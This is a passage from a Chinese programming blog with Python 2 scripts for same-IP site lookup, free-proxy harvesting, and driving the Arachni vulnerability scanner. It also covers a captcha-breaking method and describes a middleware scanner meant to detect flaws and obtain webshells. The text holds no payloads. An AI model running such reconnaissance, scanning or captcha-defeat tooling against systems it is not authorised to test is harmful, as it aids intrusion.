python 旁站查询

发布时间:July 30, 2016 // 分类:开发笔记,工作日志,代码学习,linux,python,windows // No Comments

旁站查询来源:

效果图如下

#!/usr/bin/env python
#encoding: utf-8
import re
import sys
import json
import time
import requests
import urllib
import requests.packages.urllib3
from multiprocessing import Pool
from BeautifulSoup import BeautifulSoup
requests.packages.urllib3.disable_warnings()

headers = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20'}

def links_ip(host):   
    '''
    查询同IP网站
    '''
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        source = requests.get('http://i.links.cn/sameip/' + host + '.html', headers=headers,verify=False)
        soup = BeautifulSoup(source.text)
        divs = soup.findAll(style="word-break:break-all")
        
        if divs == []: #抓取结果为空
            print 'Sorry! Not found!'
            return ip2hosts 
        for div in divs:
            #print div.a.string
            ip2hosts.append(div.a.string)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts

def ip2host_get(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), headers=headers,verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts


def filter(host):
    '''
        打不开的网站...
    '''
    try:
        response = requests.get(host, headers=headers ,verify=False)
        server = response.headers['Server']
        title = re.findall(r'<title>(.*?)</title>',response.content)[0]
    except Exception,e:
        #print "%s" % str(e)
        #print host
        pass
    else:
        print host,server

def aizhan(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href="[^']+?([^']+?)/" rel="nofollow" target="_blank">\1</a>'''
    regexp_next = r'''<a href="http://dns.aizhan.com/[^/]+?/%d/">%d</a>'''
    url = 'http://dns.aizhan.com/%s/%d/'

    page = 1
    while True:
        if page > 2:
            time.sleep(1)   #防止拒绝访问
        req = requests.get(url % (host , page) ,headers=headers ,verify=False)
        try:
            html = req.content.decode('utf-8')  #取得页面
            if req.status_code == 400:
                break
        except Exception as e:
            print str(e)
            pass
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1

    return ip2hosts

def chinaz(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href='[^']+?([^']+?)' target=_blank>\1</a>'''
    regexp_next = r'''<a href="javascript:" val="%d" class="item[^"]*?">%d</a>'''
    url = 'http://s.tool.chinaz.com/same?s=%s&page=%d'

    page = 1
    while True:
        if page > 1:
            time.sleep(1)   #防止拒绝访问
        req = requests.get(url % (host , page) , headers=headers ,verify=False)
        html = req.content.decode('utf-8')  #取得页面
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1
    return ip2hosts

def same_ip(host):
    mydomains = []
    mydomains.extend(ip2host_get(host))
    mydomains.extend(links_ip(host))
    mydomains.extend(aizhan(host))
    mydomains.extend(chinaz(host))
    mydomains = list(set(mydomains))
    p = Pool()
    for host in mydomains:
        p.apply_async(filter, args=(host,))
    p.close()
    p.join()


if __name__=="__main__":
    if len(sys.argv) == 2:
        same_ip(sys.argv[1])
    else:
        print ("usage: %s host" % sys.argv[0])
        sys.exit(-1)

 

python获取http代理

发布时间:July 24, 2016 // 分类:工作日志,运维工作,开发笔记,linux,windows,python // 7 Comments

主要是从http://www.ip181.com/ http://www.kuaidaili.com/以及http://www.66ip.com/获取相关的代理信息,并分别访问v2ex.com以及guokr.com以进行验证代理的可靠性。

# -*- coding=utf8 -*-
"""
    从网上爬取HTTPS代理
"""
import re
import sys
import time
import Queue
import logging
import requests
import threading
from pyquery import PyQuery
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()


#logging.basicConfig(
#    level=logging.DEBUG,
#    format="[%(asctime)s] %(levelname)s: %(message)s")

class Worker(threading.Thread):  # 处理工作请求
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except Queue.Empty:
                break


class WorkManager:  # 线程池管理,创建
    def __init__(self, num_of_workers=10):
        self.workQueue = Queue.Queue()  # 请求队列
        self.resultQueue = Queue.Queue()  # 输出结果的队列
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # 创建工作线程
            self.workers.append(worker)  # 加入到线程队列

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # 从池中取出一个线程处理请求
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # 重新加入线程池中
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # 向工作队列中加入请求

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)

def check_proxies(ip,port):
    """
    检测代理存活率
    分别访问v2ex.com以及guokr.com
    """
    proxies={'http': 'http://'+str(ip)+':'+str(port)}
    try:
        r0 = requests.get('http://v2ex.com', proxies=proxies,timeout=30,verify=False)
        r1 = requests.get('http://www.guokr.com', proxies=proxies,timeout=30,verify=False)

        if r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and "09043258" in r1.content and "15015613" in r0.content:
            #r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and 
            print ip,port
            return True
        else:
            return False

    except Exception, e:
        pass
        #sys.stderr.write(str(e))
        #sys.stderr.write(str(ip)+"\t"+str(port)+"\terror\r\n")
        return False

def get_ip181_proxies():
    """
    http://www.ip181.com/获取HTTP代理
    """
    proxy_list = []
    try:
        html_page = requests.get('http://www.ip181.com/',timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
        jq = PyQuery(html_page)
        for tr in jq("tr"):
            element = [PyQuery(td).text() for td in PyQuery(tr)("td")]
            if 'HTTP' not in element[3]:
                continue

            result = re.search(r'\d+\.\d+', element[4], re.UNICODE)
            if result and float(result.group()) > 5:
                continue
            #print element[0],element[1]
            proxy_list.append((element[0], element[1]))
    except Exception, e:
        sys.stderr.write(str(e))
        pass

    return proxy_list

def get_kuaidaili_proxies():
    """
    http://www.kuaidaili.com/获取HTTP代理
    """
    proxy_list = []
    for m in ['inha', 'intr', 'outha', 'outtr']:
        try:
            html_page = requests.get('http://www.kuaidaili.com/free/'+m,timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    for n in range(0,11):
        try:
            html_page = requests.get('http://www.kuaidaili.com/proxylist/'+str(n)+'/',timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list

def get_66ip_proxies():
    """
    http://www.66ip.com/ api接口获取HTTP代理
    """
    urllists = [
        'http://www.proxylists.net/http_highanon.txt',
        'http://www.proxylists.net/http.txt',
        'http://www.66ip.cn/nmtq.php?getnum=1000&anonymoustype=%s&proxytype=2&api=66ip',
        'http://www.66ip.cn/mo.php?sxb=&tqsl=100&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1'
        ]
    proxy_list = []
    for url in urllists:
        try:
            html_page = requests.get(url,timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
            patterns = re.findall(r'((?:\d{1,3}\.){1,3}\d{1,3}):([1-9]\d*)',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list


def get_proxy_sites():
    wm = WorkManager(20)
    proxysites = []
    proxysites.extend(get_ip181_proxies())
    proxysites.extend(get_kuaidaili_proxies())
    proxysites.extend(get_66ip_proxies())

    for element in proxysites:
        wm.add_job(check_proxies,str(element[0]),str(element[1]))
    wm.start()
    wm.wait_for_complete()


if __name__ == '__main__':
    try:
        get_proxy_sites()
    except Exception as exc:
        print(exc)

Arachni 相关

发布时间:June 21, 2016 // 分类:工作日志,运维工作,开发笔记,linux,代码学习,python // 2 Comments

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import json
import random
import base64
import hashlib
import threading
import subprocess
from gevent.pool import Pool
from urlparse import urlparse
from get_form import auto_fill_form,getform
"""
这里的作用就是把爬虫结果转化为json
检测思路
1.执行命令
arachni --audit-links --audit-forms --http-user-agent="Mozilla/5.0 (X11; Linux i686; U;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" \
    http://testphp.vulnweb.com/ --checks=sql_injection,xss,directory_listing,csrf,xpath_injection --report-save-path=/Users/saline/tools/mycode/spider/report/last0.afr

ruby /Users/saline/tool/tools/arachni/bin/../system/arachni-ui-web/bin/arachni --audit-links --audit-forms --audit-jsons --audit-xmls --audit-ui-inputs --scope-exclude-file-extensions=html --scope-exclude-file-extensions=shtml --http-user-agent="iaskspider/2.0(+http://iask.com/help/help_index.html)" --checks=sql_injection,rfi,directory_listing --report-save-path=/Users/saline/tools/mycode/spider/report/demo.aisec.cn_104446e2321d31be6031ec6daad80c47.afr --timeout=8:00:00 http://demo.aisec.cn/demo/

2.把afr利用arachni_reporter转化为json
#arachni_reporter --reporters-list
arachni_reporter /Users/saline/tools/mycode/spider/report/last0.afr --reporter=json:outfile=/Users/saline/tools/mycode/spider/report/last0_result.json

3.从json里面读取相关的结果,再进行二次分析利用
dist = open('/Users/saline/tools/mycode/spider/report/baimao.json').read()
result = json.loads(dist)
for url in result["sitemap"]:
    if int(result["sitemap"][url]) != 404:
        #输出非404的结果,其实还应该执行对比
        #print url
for urls in result["issues"]:
    print urls["vector"]["action"]+"\t"+urls["vector"]["method"]
    print urls["vector"]["inputs"]

参见帮助文档
http://doc.0xa.cc/r/FIdMhkWFYUvhdKOQQFWtBOltIGxlgsqByLSSPqzkXYRULiYZgm:mobile
http://www.cnblogs.com/vamei/archive/2012/09/23/2698014.html
"""
# 需额外安装arachni
# Arachni rpc clint scan class
class Arachni_Console(object):

    def random_useragent(self):
        USER_AGENTS = [
            "Baiduspider+(+http://www.baidu.com/search/spider.htm)",
            "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
            "Googlebot/2.1 (+http://www.googlebot.com/bot.html)",
            "Googlebot/2.1 (+http://www.google.com/bot.html)",
            "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
            "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
            "iaskspider/2.0(+http://iask.com/help/help_index.html)",
            "Sogou web spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)",
            "Sogou Push Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)",
            "Mozilla/5.0 (compatible; YodaoBot/1.0;http://www.yodao.com/help/webmaster/spider/;)",
            "msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
            "Sosospider+(+http://help.soso.com/webspider.htm)",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.0.11)  Firefox/1.5.0.11; 360Spider",
            "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/”; )",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
            "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)",
            "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
            "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0",
        ]
        return random.choice(USER_AGENTS)
    #扫描中需要注意的是几个地方。允许自定义,交互性较好
    #1.自定义cookie --http-cookie-string
    #2.带有401认证的 --http-authentication-username=username --http-authentication-password=password
    #3.自定义扫描路径 --scope-extend-paths
    #4.自定义ua --http-user-agent
    #5.线程数量 --http-request-concurrency 默认20
    #默认排除html/shtml这类静态文件,可能会对部分jsp的页面带来影响
    def __init__(self, url, http_agent="", cookies=""):
        self.http_agent = "%s"%(self.random_useragent())
        self.start_time         = str(time.time())
        self.url                = url
        self.report             = "%s_%s" % (urlparse(url).netloc, hashlib.md5(self.start_time).hexdigest())
        self.arachni_client  = '/Users/saline/tool/tools/arachni/bin/arachni'
        self.arachni_reporter  = '/Users/saline/tool/tools/arachni/bin/arachni_reporter'
        self.report_file  =  " --report-save-path=/Users/saline/tools/mycode/spider/report/%s.afr" % self.report
        self.cookies  = cookies
        #self.audit = "--audit-links --audit-forms --audit-cookies"
        self.audit = "--audit-links --audit-forms --audit-jsons --audit-xmls --audit-ui-inputs --scope-exclude-file-extensions=html --scope-exclude-file-extensions=shtml"
        self.h_agent = " --http-user-agent=\"%s\"" % (self.http_agent)
        self.h_cookies = " --http-cookie-string=\"%s\"" % (self.cookies)
        self.checks = " --checks=sql_injection,rfi,directory_listing"
        # self.checks = "--checks=rfi,directory_listing,sql_injection,sql_injection_timing,sql_injection_differential,source_code_disclosure,file_inclusion"
        self.timeout = " --timeout=%s" % "8:00:00"
        self.option = self.audit + self.h_agent + self.checks + self.report_file + self.timeout
        self.is_timeout = False
        self.proc       = None
        self.report_jsfile  = '/Users/saline/tools/mycode/spider/report/%s.json' % self.report
        self.result = None

    # Start to Scan
    def _Scan(self):
        # subprocess command
        arachni_cmd = "%s %s %s"%(self.arachni_client,self.option,self.url)
        #self.timer = threading.Timer(6000 * 10 * 10, self.set_time_out())
        #self.timer.start()
        os.system(arachni_cmd)
        #调用subprocess执行有问题。放弃,由于这只是需要结果。所以无需回显
        #self.proc = subprocess.Popen(self.cmd, shell=False)
        #self.proc = subprocess.Popen(arachni_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        #self.proc.wait()
        #for lines in proc.stdout.readlines():
        #    print(lines)
        #self.timer.cancel()
        #for lines in self.proc.stdout.readlines():

    # timeout function
    def set_time_out(self):
        if self.proc is not None:
            self.is_timeout = True
            self.timer.cancel()
            self.proc.kill()

    def get_report(self):
        # arachni_reporter /tmp/test.afr --report=json:outfile=/tmp/test.json
        try:
            self._Scan()
            self._report()
        except Exception, e:
            pass

        return self.result

    # get result, format is json
    def _report(self):
        self.cmd = [
            self.arachni_reporter,
            "/Users/saline/tools/mycode/spider/report/%s.afr" % self.report,
            '--report=json:outfile=%s' % self.report_jsfile
        ]
        self.proc = subprocess.Popen(self.cmd)
        self.proc.wait()
        #self.result = open(self.report_jsfile).read()
        # del report files
        delcmd = "rm -rf /Users/saline/tools/mycode/spider/report/%s.afr" % self.report
        os.system(delcmd)
        self.result = self.report_jsfile
        #self.result = self.get_json(self.report_jsfile)
        #if len(self.result)>0:
        #    return self.result

        #os.remove(self.report_file)
        #os.remove(self.report_jsfile)
#解析json
def get_json(jsonfile):
    #print int(time.time())
    vul_results = []
    jsonresult = []
    dist = open(jsonfile).read()
    result = json.loads(dist)
    #for url in result["sitemap"]:
    #    if int(result["sitemap"][url]) != 404:
    #        pass
            #print url
    if len(result["issues"])>0:
        for urls in result["issues"]:
            data = ''
            acturl = urls["vector"]["action"]
            #urls.append(str(urls["vector"]["action"]))
            #获取input信息
            for vuln in urls["vector"]["inputs"]:
                if len(auto_fill_form(str(vuln)))>0:
                    value = auto_fill_form(str(vuln))
                    data = data + vuln+'='+value+'&'
                else:
                    value = 'casterjs'
                    data = data + vuln +'='+value+'&'
            #获取到actmethod
            if str(urls["vector"]["method"]).find('get')!=-1:
                actmethod = 'GET'
            elif str(urls["vector"]["method"]).find('post')!=-1:
                actmethod = 'POST'

            if str(actmethod).find('get')!=-1 or str(actmethod).find('GET')!=-1:
                if acturl.find('?') ==-1:
                    acturl = acturl +'?'+data.rstrip('&')
                else:
                    acturl = acturl +'&'+data.rstrip('&')
            if len(data.rstrip('&')) == 0:
                actmethod = 'GET'
            vul_results.append(({"url": acturl,
                "probe": {
                    "payload": data.rstrip('&'),
                    "method": actmethod,
                    "url": acturl,
                    "headers": urls["request"]["headers"],}}))
    if len(result["sitemap"])>0:
        for url in result["sitemap"]:
            if result["sitemap"][url] != 404:
                results = getform(url)
                if result is not None:
                    for lists in results:
                        if lists["probe"]['url'] not in jsonresult:
                            data = base64.b64encode(json.dumps(lists["probe"]))
                            newurl = lists["probe"]['url']
                            jsonresult.append(newurl + ' '+ data)
                            #urls.append(newurl + ' '+ data)

    if vul_results is not None:
        for lists in vul_results:
            if lists["probe"]['url'] not in jsonresult:
                data = base64.b64encode(json.dumps(lists["probe"]))
                newurl = lists["probe"]['url']
                jsonresult.append(newurl + ' '+ data)

    if len(jsonresult)>0:
        return jsonresult

if __name__ == '__main__':
    #domain ="http://0cx.cc/"
    domains = ['http://demo.aisec.cn/demo','http://testphp.vulnweb.com/']
    for domain in domains:
        arachni_console = Arachni_Console(domain, http_agent='')
        try:
            results = get_json(arachni_console.get_report())
            for resu in results:
                print resu
        except Exception as e:
            print(str(e))

 

拾取表单的脚本参考http://0cx.cc/get_form_name.jspx

#!/usr/bin/env python
# -*- encoding: utf-8 -*-

#https://github.com/Arachni/arachni/wiki/REST-server
#https://github.com/Arachni/arachni/wiki/REST-API
'''
开启api
arachni_rest_server 
[开启认证]
(./bin/arachni_rest_server  --address=192.168.87.134 --port=7331  --authentication-username=admin --authentication-password=adminpassword)


1.查看扫描状态
GET /scans

2.提交扫描
POST /scans
json.dumps(xxx.json)
其实需要提供的是url和profiles

3.查看某个id的状态
GET /scans/:id

状态大约有几种[
   a.ready 准备中。但是不曾启动扫描
   b.preparing  准备好了,随时可以启动扫描(即初始化插件)
   c.scanning   扫描中
   d.pausing   扫描被暂停了
   e.paused    扫描已经被停职了
   f.cleanup   扫描已经被中止(即等待插件完成等)
   g.aborted   扫描非正常状态结束
   h.done      扫描结束
]

4.暂停扫描
PUT /scans/:id/pause

5.开始[已暂停的]扫描
PUT /scans/:id/resume

6.提取扫描报告
GET /scans/:id/report
GET /scans/:id/report.json
GET /scans/:id/report.xml
GET /scans/:id/report.yaml
GET /scans/:id/report.html.zip

7.删除扫描
DELETE /scans/:id

'''

import urllib2
import json

class ArachniClient(object):

   with open('./profiles/default.json') as f:
      default_profile = json.load(f)

   def __init__(self, arachni_url = 'http://192.168.87.134:7331'):
      self.arachni_url = arachni_url
      self.options = ArachniClient.default_profile

   def get_http_request(self, api_path):
      return urllib2.urlopen(self.arachni_url + api_path).read()

   def post_api(self, api_path):
      options = json.dumps(self.options)
      request = urllib2.Request(self.arachni_url + api_path, options)
      request.add_header('Content-Type', 'application/json')
      return urllib2.urlopen(request).read()

   def put_request(self, api_path):
      request = urllib2.Request(self.arachni_url + api_path)
      request.get_method = lambda: 'PUT'
      return urllib2.urlopen(request).read()

   def delete_request(self, api_path):
      request = urllib2.Request(self.arachni_url + api_path)
      request.get_method = lambda: 'DELETE'
      return urllib2.urlopen(request).read()
   #获取扫描    
   def get_scans(self):
      return json.loads(self.get_http_request('/scans'))
   #获取扫描状态
   def get_status(self, scan_id):
      return json.loads(self.get_http_request('/scans/' + scan_id))
   #暂停扫描
   def pause_scan(self, scan_id):
      return self.put_request('/scans/' + scan_id + '/pause')
   #重启扫描
   def resume_scan(self, scan_id):
      return self.put_request('/scans/' + scan_id + '/resume')
   #获取扫描结果
   def get_report(self, scan_id, report_format = None):
      if self.get_status(scan_id)['status'] == 'done':

         if report_format == 'html':
            report_format = 'html.zip'

         if report_format in ['json', 'xml', 'yaml', 'html.zip']:
            return self.get_http_request('/scans/' + scan_id + '/report.' + report_format)
         elif report_format == None:
            return self.get_http_request('/scans/' + scan_id + '/report')
         else:
            print 'your requested format is not available.'

      else:
         print 'your requested scan is in progress.'
   #删除扫描
   def delete_scan(self, scan_id):
      return self.delete_request('/scans/' + scan_id)
   #开启扫描
   def start_scan(self):
      if self.options['url']:
         return json.loads(self.post_api('/scans'))
      else:
         print 'Target is not set!'

   def target(self, target_url):
      try:
         urllib2.urlopen(target_url)
         self.options['url'] = target_url
      except urllib2.HTTPError, e:
         print e.code

   def profile(self, profile_path):
      with open(profile_path) as f:
         self.options = json.load(f)

if __name__ == '__main__':
   a = ArachniClient()
   a.profile('./profiles/default.json')
   #'http://testphp.vulnweb.com/','http://23.88.112.156/xvwa/'
   a.target('http://23.88.112.156/xvwa/')
   print a.start_scan()

 

Python识别验证码

发布时间:May 19, 2016 // 分类:开发笔记,代码学习,linux,python,生活琐事 // 1 Comment

最近学习Python识别验证码。

基本都是基于图片处理选择PIL来围绕拓展的。想到之前以前搞过的openvc是否可以做的全面一些呢

下面的是剽窃一个验证码识别大赛的东西,

验证码大概为6种

type1.

type2.

type3.

type4.

type5.

type6.

所有验证码都遵循先分割再识别的流程,分割主要方法是等距分割:type1字符位置固定,分割较简单;type2,type4由于字符数目固定,可以直接等距分割;type3,type5,type6由于字符数目并不固定,所以第一步是识别验证码所包含的字符数,然后再等距分割。汉字/字母/数字的识别模型都是卷积神经网络。type1由于训练集无法直接使用,所以我们根据常用汉字训练了一个通用汉字/拼音识别模型,其他类型验证码均可使用训练集来训练识别模型,其中type3和type4还有可利用的语言上下文信息。
关键技术:当字符数目不确定时,先预测验证码包含的字符个数,再根据字符数进行分割,这样type5,type6的识别问题就分别和type2,type4类似了,这是一种简单通用的验证码识别方案。

算法总体思路如下图,先分割再识别。分割采用等距分割思想,识别采用CNNs模型

type1

此类验证码上方九宫格部分由于字符位置固定,可以直接定位识别。下方3个汉字和一个拼音,垂直方向位置也是固定的,只是水平方向结束的位置在变化,可以按列相加的方法确定结束的位置,然后同时从左右两端开始识别汉字并且确定和上方九宫格汉字的对应关系,找到相似度最大的三个汉字后,剩下的位置就是拼音,直接识别拼音再次到九宫格寻找对应汉字即可。共包含两种识别模型,汉字识别:挑选常用4800个汉字,拼音识别:所有408个拼音。

type2

如图所示,此类验证码包含26个字母和10个数字,而且每张验证码均包含5个位置固定的字符,间距变化很小,所以直接等距分割(相邻字符有重叠)。利用训练集共10万个字符直接训练CNN即可,无需重新生成训练数据。

type3

此类验证码分两种情况。
1.拼音首字母,要求输出4-5个字符的成语或诗句的拼音首字母。根据训练集统计可知共包含约700个不同成语或诗句,所以首先将训练集的首字母重新标注为成语或诗句,接下来就只是一个汉字识别问题。从图像上看,根据“的拼音首字母”的“的”字可以将图像分为左右两部分,所要识别的只是左边部分的4或5个汉字。所以识别流程如下:
1) 根据水平方向从左至右第85像素将图像分割为两部分
2) 预测左边图像部分包含字符的个数n={4,5},是个二分类问题,这一步实验中识别率达到0.999以上
3) 确定最左边字符的起始位置后,根据n的大小,可以在水平方向上进行等距分割
4) 由于垂直方向字符位置有较大变化,所以去除背景像素后,计算每列像素的重心,依次可以进一步确定每个字符在垂直方向的精确位置
5) 分割出来之后,用训练集所训练的汉字识别模型进行识别。测试时,如果所识别出的成语或诗句未在训练集出现,则在训练集中寻找最相似的代替
2.成语。要求直接输出成语本身,这种验证码与输出首字母的验证码类似,但是只需要3) 4) 5)三步即可。

type4

识别思路与type3的第2种情况完全相同,只是数据集不同而已。

type5

统计训练集可知,每个验证码只包含4-5个字母或数字,相邻字符粘连在一起。

  1. 水平方向采用按列相加的方法可以确定起始和结束的位置,垂直方向字符都在第1至36像素间,据此可以从整幅图像中获得验证码的具体位置
  2. 预测验证码包含的字符数之后进行等距分割并识别得到最终结果

###type6

识别思路完全和type5相同,只是字母数字变为了汉字。这类验证码是带噪声的扭曲汉字,而且每个验证码的汉字是随机的、没有任何语义信息,是所有类别中最难的一类。开始我也搁置了很久,但是在某一天偶然得到灵感:就是先预测验证码中包含的字符数,这样一来除了字符识别起来更难一些之外,type6和其他类并没有什么其区别了,所以我在做type5和type6时使用了完全相同的思路和算法。

Mac 下安装 Python-OpenCV

首先确保已经安装了Python.Mac 下可以直接使用 brew 来安装OpenCV,具体步骤如下:

# add opencv
brew tap homebrew/science

# install opencv
brew install opencv

安装必要的python库

pip install numpy
pip install matplotlib

测试是否安装成功

import cv2
import numpy as np
from matplotlib import pyplot as plt

img = cv2.imread('road.png', 0)
plt.imshow(img, cmap='gray', interpolation='bicubic')
plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
plt.show()

作为一个曾经编译过无数次 OpenCV 最后好不容易成功的人来说,我觉得安装 OpenCV 这个问题可以归为玄学,尤其是在 Windows 下,所以安装的时候最好多请教 Google, Good Luck!还是按照这个来吧.Install OpenCV On Mac

具体的内容等我找到资料了慢慢的填充

参考几篇文章

http://aducode.github.io/posts/2014-07-08/python_identification_verification_code.html
http://sineyuan.github.io/2016/01/06/python-captcha/
http://www.pythonclub.org/project/captcha/python-pil
http://bbs.pkbigdata.com/topic/8726c0abb99142c88b8b422483aedb75.html
http://blog.csdn.net/niuwei22007/article/category/5868745
http://www.pyimagesearch.com/2015/06/15/install-opencv-3-0-and-python-2-7-on-osx/
http://seisman.info/anaconda-scientific-python-distribution.html

python multiprocessing apply_async only uses one process

发布时间:April 20, 2016 // 分类:开发笔记,python,生活琐事 // No Comments

某天写了一个多进程的东西。发现无法准确获得返回结果

import os
from multiprocessing import Pool

results = []
def testFunc(files):
    for file in files:
        print "Working in Process #%d" % (os.getpid())
        #This is just an illustration of some logic. This is not what I'm actually doing.
        for line in file:
            if 'dog' in line:
                results.append(line)

if __name__=="__main__":
    p = Pool(processes=2)
    files = ['/path/to/file1.txt', '/path/to/file2.txt']
    results = p.apply_async(testFunc, args = (files,))
    results2 = results.get()
  • apply_async farms out one task to the pool. You would need to call apply_async many times to exercise more processors.
  • Don't allow both processes to try to write to the same list, results. Since the pool workers are separate processes, the two won't be writing to the same list. One way to work around this is to use an ouput Queue. You could set it up yourself, or use apply_async's callback to setup the Queue for you. apply_async will call the callback once the function completes.
  • You could use map_async instead of apply_async, but then you'd get a list of lists, which you'd then have to flatten.

然后更改为

import os
import multiprocessing as mp

results = []   

def testFunc(file):
    result = []
    print "Working in Process #%d" % (os.getpid())
    # This is just an illustration of some logic. This is not what I'm
    # actually doing.
    with open(file, 'r') as f:
        for line in f:
            if 'dog' in line:
                result.append(line)
    return result


def collect_results(result):
    results.extend(result)

if __name__ == "__main__":
    p = mp.Pool(processes=2)
    files = ['/path/to/file1.txt', '/path/to/file2.txt']
    for f in files:
        p.apply_async(testFunc, args=(f, ), callback=collect_results)
    p.close()
    p.join()
    print(results)

再有

import os
from multiprocessing import Pool

results = []
def testFunc(file):
    message =  ("Working in Process #%d" % (os.getpid()))
    #This is just an illustration of some logic. This is not what I'm actually doing.
    for line in file:
        if 'dog' in line:
            results.append(line)
    return message

if __name__=="__main__":
    print("saddsf")
    p = Pool(processes=2)
    files = ['/path/to/file1.txt', '/path/to/file2.txt']
    results = p.map_async(testFunc, files)
    print(results.get())

感觉第二种方式靠谱一些

中间件漏洞检测框架(F-MiddlewareScan)

发布时间:March 20, 2016 // 分类:开发笔记,工作日志,linux,windows,python,生活琐事 // 1 Comment

纯python编写的轻量级中间件漏洞检测框架,实现针对中间件的自动化检测,端口探测->中间件识别->漏洞检测->获取webshell 
参数说明 
-h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),最多限制一次可扫描65535个IP。 
-p 指定要扫描端口列表,多个端口使用,隔开 例如:7001,8080,9999。未指定即使用内置默认端口进行扫描(80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080) 
-m 指定线程数量 默认100线程 
-t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 
 

漏洞检测脚本以插件形式存在,可以自定义添加修改漏洞插件,存放于plugins目录,插件标准非常简单,只需对传入的IP,端口,超时进行操作,成功返回“YES|要打印出来的信息”即可。 
新增插件需要在 plugin_config.ini配置文件中新增关联(多个漏洞插件以逗号隔开)。 
中间件识别在discern_config.ini文件中配置(支持文件内容和header识别) 

目前内置了19个漏洞插件,希望大家可以一起编写更多的插件,目前还缺少weblogic自动部署和反序列化探测以及中间件的反序列化自动获取webshell的插件等等。 

周末感冒无事,除了吃药意外就是发呆了。好友说想要修改一下,增加CMS识别以及同服查询的功能。动手开始做

def exploit(URL, Thread):
    w = cms.WhatWeb(URL, Thread)
    w.run()
    if w.result:
        return w.result

def whatcms(scan_type,task_host,task_port):
    task_port = '80'
    if task_host.find('http') == -1:
        URL = 'http://'+str(task_host)
    elif task_host.find('///') !=1 and task_host.find('~') == -1:
        URL = str(task_host.replace('///','://'))
    elif task_host.find('///') !=1 and task_host.find('~') != -1:
        URL = task_host.replace('///','://').replace('~',':').rstrip('/')
    log(scan_type,URL,task_port)
    Thread = 40
    try:
